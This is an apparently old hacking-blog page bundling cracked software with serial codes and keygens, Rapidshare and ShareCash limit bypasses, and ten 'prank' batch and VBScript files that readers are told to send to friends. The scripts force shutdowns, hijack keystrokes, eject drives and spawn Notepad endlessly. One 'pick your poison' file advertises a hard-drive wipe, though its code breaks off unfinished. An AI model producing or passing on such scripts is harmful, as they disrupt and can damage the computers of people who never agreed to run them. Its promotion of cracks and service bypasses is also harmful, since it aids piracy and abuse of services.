Pilih Warna Latar


About Me In Facebook

Pages

11.27.2011

BIG HACK PACK 2011

 
TO ALL HACK
TRY THIS ^^

6.20.2011

Threaded Mode | Linear Mode Google Hacks & Download Trick 2011

Google Hacks & Download Trick


Google Hacks can be used to find music, books, lyrics, fonts, tools and applications, proxies and more. Just fire it up after installation, type your search query, choose the type of media you want to search for and you’re done. You’re taken to a Google Search Results page with relevant stuff.

Google Hacks is a nifty tool that can help you find stuff on the web easily with the power of Google. At this tool can assist you in finding music, books, lyrics and other materials easily, leveraging Google’s advanced search operators. Knowledge of advanced search operators isn’t necessary with Google Hacks near you.

Google Hacks eliminates the need for knowing advanced search operators, and saves your time, finding quality result.

6.18.2011

Mastercard hack

Newest ShareCash Downloader

Newest ShareCash Downloader This is the Newest working sharecash download available.

[Image: 54918564.jpg] 
 

Facebook Blaster Pro + Serial Code 2011 [FREE]

DOWNLOADS:

Facebook Blaster Pro

Serial Code

KeyGen

_________________________________________________
Enjoy Smiling

Rapidshare Hack [Tutorial] SAFE

There are two hacks to beat Rapidshare download limits and waiting time.


1) Rapidshare Hack (For Firefox Users) :-
The hot new Firefox plug-in takes browser customization to a whole new level by letting users filter site content or change page behaviors.
The glory of open-source software is that it allows anyone with the inclination and the scripting knowledge to get under the hood and hot-rod their computing environment.
But most of the time, that advantage is available only to people with the programming skills to make the changes they want.

That's where Greasemonkey, a free plug-in for Firefox, comes in -- it simplifies hacking the browser.

Released at the end 2004, Greasemonkey is the latest in a growing arsenal of Firefox customization tools.
It changes how Web pages look and act by altering the rendering process.

http://www.greasespot.net/

1) Install the Greasemonkey extension>>
http://downloads.mozdev.org/greasemonkey..._0.2.6.xpi
2) Restart Firefox
3) Go to http://w12.easy-share.com/5941441.html
4) Right click on rapidshare.user.js and choose "Install User Script".
5) Run FireFox.
6) From 'File' Menu click on Open File then browse to whereever you saved the 'greasemonkey.xpi' plug-in.
Open it, wait a couple seconds for the install button becomes active.
7) Click on it to install this plug-in then CLOSE FIREFOX.
8) Run FireFox again.
From the File Menu click on Open File then browse to whereever you saved the 'rapidshare.user.js'.
9) Open it.
10) Click the Tools Menu then click on Install User Script then click OK.
11) Close FireFox.

The script will let you enjoy "no wait" and multiple file downloads......!


2) Rapidshare Hack (NIC Tricks and MAC Cloning) :-
Rapidshare traces the users IP address to limit each user to a certain amount of downloading per day.
To get around this, you need to show the rapidshare server a different IP address.
Here are some methods for doing this-

A] Short-Out the J
1) Goto the page you want to download
2) Select FREE button
3) In the address bar put this- jalert(c=0)
4) Click OK
5) Click OK to the pop-up box
6) Enter the captcha
7) Download Your File

B] Request a new IP address from your ISP server:
Here’s how to do it in windows:
1) Click Start
2) Click run
3) In the run box type cmd.exe and click OK
4) When the command prompt opens type the following. ENTER after each new line.
ipconfig /flushdns
ipconfig /release
ipconfig /renew
exit
5) Erase your cookies in whatever browser you are using.
6) Try the rapidshare download again.
Frequently you will be assigned a new IP address when this happens.
Sometime you will, sometimes you will not. If you are on a fixed IP address, this method will not work.
If this works for you, you may want to save the above commands into a batch file, and just run it when you need it.

C] Use a proxy with SwitchProxy and Firefox:
1) Download and install Firefox
2) Download and install SwitchProxy
3) Google for free proxies
4) When you hit your download limit, clean your cookies and change your proxy

D] You can use a bookmarklet to stop your wait times:
1) Open IE
2) Right Click On This Link
3) Select Add to Favorites
4) Select Yes to the warning that the bookmark may be unsafe.
5) Name it “RapidShare No Wait”
6) Click on the Links folder (if you want to display it in your IE toolbar)
7) Click OK
8) You may need to close and reopen IE to see it
9) Goto rapidshare and click the bookmarklet when you are forced to wait.

Ten Great Scripts to Trick your Friends - Simple yet Freaky!!!

Here are some cool freaky tricks to prank your friends. Just type the given code or copy and paste it in Notepad and save it accordingly.

  • 1) Display a Small message and then shut down his / her computer :
    TYPE THIS CODE :
    Hidden:
    Code:
    @echo off
    msg * I don't like you
    shutdown -c "Error! You are too stupid!" -s
    Save it as "Anything.BAT" in All Files and send it.
  • 2) Toggle your friend's Caps Lock button simultaneously :
    TYPE THIS CODE :
    Hidden:
    Code:
    Set wshShell =wscript.CreateObject("WScript.Shell")
    do
    wscript.sleep 100
    wshshell.sendkeys "{CAPSLOCK}"
    loop
    Save it as "Anything.VBS" and send it.
  • 3) Continually Eject and Load your friend's CD Drive. If he / she has more than one, watch them all them all pop In and Out!!!
    TYPE THIS CODE :
    Hidden:
    Code:
    Set oWMP = CreateObject("WMPlayer.OCX.7")
    Set colCDROMs = oWMP.cdromCollection
    do
    if colCDROMs.Count >= 1 then
    For i = 0 to colCDROMs.Count - 1
    colCDROMs.Item(i).Eject
    Next
    For i = 0 to colCDROMs.Count - 1
    colCDROMs.Item(i).Eject
    Next
    End If
    wscript.sleep 5000
    loop
    Save it as "Anything.VBS" and send it.
  • 4) Frustrate your friend by making this VBScript, causing Enter to be hit repeatedly and simultaneously :
    TYPE THIS CODE :
    Hidden:
    Code:
    Set wshShell = wscript.CreateObject("WScript.Shell")
    do
    wscript.sleep 100
    wshshell.sendkeys "~(enter)"
    loop
    Save it as "Anything.VBS" and send it.
  • 5) Open Notepad, slowly type "Hello, how are you? I am good thanks" and then freak your friend out :
    TYPE THIS CODE :
    Hidden:
    Code:
    WScript.Sleep 180000
    WScript.Sleep 10000
    Set WshShell = WScript.CreateObject("WScript.Shell")
    WshShell.Run "notepad"
    WScript.Sleep 100
    WshShell.AppActivate "Notepad"
    WScript.Sleep 500
    WshShell.SendKeys "Hel"
    WScript.Sleep 500
    WshShell.SendKeys "lo "
    WScript.Sleep 500
    WshShell.SendKeys ", ho"
    WScript.Sleep 500
    WshShell.SendKeys "w a"
    WScript.Sleep 500
    WshShell.SendKeys "re "
    WScript.Sleep 500
    WshShell.SendKeys "you"
    WScript.Sleep 500
    WshShell.SendKeys "? "
    WScript.Sleep 500
    WshShell.SendKeys "I a"
    WScript.Sleep 500
    WshShell.SendKeys "m g"
    WScript.Sleep 500
    WshShell.SendKeys "ood"
    WScript.Sleep 500
    WshShell.SendKeys " th"
    WScript.Sleep 500
    WshShell.SendKeys "ank"
    WScript.Sleep 500
    WshShell.SendKeys "s! "
    Save it as "Anything.VBS" and send it.
  • 6) Frustrate your friend by making this VBScript, causing Backspace to be hit repeatedly and simultaneously :
    TYPE THIS CODE :
    Hidden:
    Code:
    MsgBox "Let's go back a few steps"
    Set wshShell =wscript.CreateObject("WScript.Shell")
    do
    wscript.sleep 100
    wshshell.sendkeys "{bs}"
    loop
    Save it as "Anything.VBS" and send it.
  • 7) Hack your friend's keyboard and make him type "You are a fool"(What ever...!) simultaneously :
    TYPE THIS CODE :
    Hidden:
    Set wshShell = wscript.CreateObject("WScript.Shell")
    do
    wscript.sleep 100
    wshshell.sendkeys "You are a fool."
    loop
    Save it as "Anything.VBS" and send it.
  • 8. Cause your friends Notepad to open continually :
    TYPE THIS CODE :
    Hidden:
    Code:
    @ECHO off
    :top
    START %SystemRoot%\system32\notepad.exe
    GOTO top
    Save it as "Anything.BAT" and send it.
  • 9) Hard prank: Pick your poison batch file. It asks your friend to choose a number between 1-5 and then does a certain action :
    1: Shutdown
    2: Restart
    3: Wipes out your hard drive (BEWARE)
    4: Net send
    5: Messages then shutdown
    TYPE THIS CODE :
    Hidden:
    Code:
    @echo off
    title The end of the world
    cd C:\
    :menu
    cls
    echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press 'x' then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc...
    pause
    echo Pick your poison:
    echo 1. Die this way (Wimp)
    echo 2. Die this way (WIMP!)
    echo 3. DO NOT DIE THIS WAY
    echo 4. Die this way (you're boring)
    echo 5. Easy way out
    set input=nothing
    set /p input=Choice:
    if %input%==1 goto one
    if %input%==2 goto two
    Save it as "Anything.BAT" and send it.